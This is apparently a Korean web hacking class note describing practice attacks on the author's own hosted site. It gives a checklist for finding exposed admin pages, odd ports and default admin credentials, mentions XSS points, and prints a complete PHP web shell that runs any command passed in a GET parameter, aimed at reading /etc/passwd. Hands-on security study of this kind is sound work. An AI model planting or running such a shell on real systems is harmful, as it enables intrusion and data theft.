본문 바로가기
Web hacking/Nomaltic) 웹 해킹 수업 노트 👩‍💻

[실습]유추 가능한 인증정보 이용 취약점

by m_.9m 2022. 1. 14.

 

 

실습을 위한 개인 호스팅 사이트에서 admin 계정 탈취를 위해서 공격을 해본 결과

3) 기본 관리자 계정 및 패스워드를 입력했을 때 쉽게 유추가능한 값으로 로그인되는 것을 확인했다.

 

 


1) 추측하기 쉬운(/admin, /manager, /master, /system, /administrator 등)의 명칭을 사용하는 디렉터리 및 파일 관리자 페이지 존재 여부 확인

 

2) 추측하기 쉬운(7001, 8080, 8443, 8888 등) 포트의 접속으로 관리자 페이지가 노출되는지 확인

 

3) 관리자 페이지의 로그인 창에 기본 관리자 계정(admin, administrator, manager) 및 패스워드를 입력하여 로그인되는지 확인

**유추가능한 인증정보 이용(비밀번호)

 

4) 사용자 인증 후 접근한 관리자 페이지 메인 페이지나 하위 메뉴 페이지 등 중간 페이지(/admin/main.jsp, /admin/menu.html 등) URL으로 인증 과정 없이 직접 접근 가능한지 확인.

 

 

 


 

또한 XSS 공격지점을 찾아서 리다이렉트 공격을 구현해보고싶었는데 VPN 사설서버대여로 실습이 가능하다고 하니 대여로 구현해보려고 한다. 댓글부분과 검색기능 부분에 XSS 가능성을 발견했다.

 

 

또한 파일 업로드 기능으로 웹쉘을 올리고 싶었는데,

<?
echo 'enter a command:<br>';
echo '<form action="">';
echo '<input type=text name="cmd">';
echo '<input type="submit">';
echo '</form>';

if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>

 

해당 PHP문을 올려 cmd창에 etc/password 정보를 불러오고싶었는데 시도중이다.

상위 디렉터리로 파일이 저장이 되는것같은데 경로를 타고 올라가는것에 실패중 --

 

 

 

 

참고 사이트는 다음과 같다.

 

https://gomguk.tistory.com/62?category=976360 

 

[모의해킹 실습] Stored XSS 취약 페이지 구현 및 공격 실습 2

Stored XSS 공격 원리 공격자가 악성 스크립트를 취약한 서버에 게시글 형태로 등록시킨 후 사용자가 해당 게시물에 접근 시 스크립트가 실행되어 피해를 발생시키는 공격 기법이다. Stored XSS는 다

gomguk.tistory.com

 

https://mer1.tistory.com/79

 

관리자 페이지 노출 취약점

본 게시글은 주요 정보통신 기반시설 기술적 취약점 분석평가 가이드를 참고하여 작성했습니다. 1. 개요 웹 어플리케이션의 전반적인 기능 설정 및 회원 관리를 할 수 있는 관리자 페이지가 추

mer1.tistory.com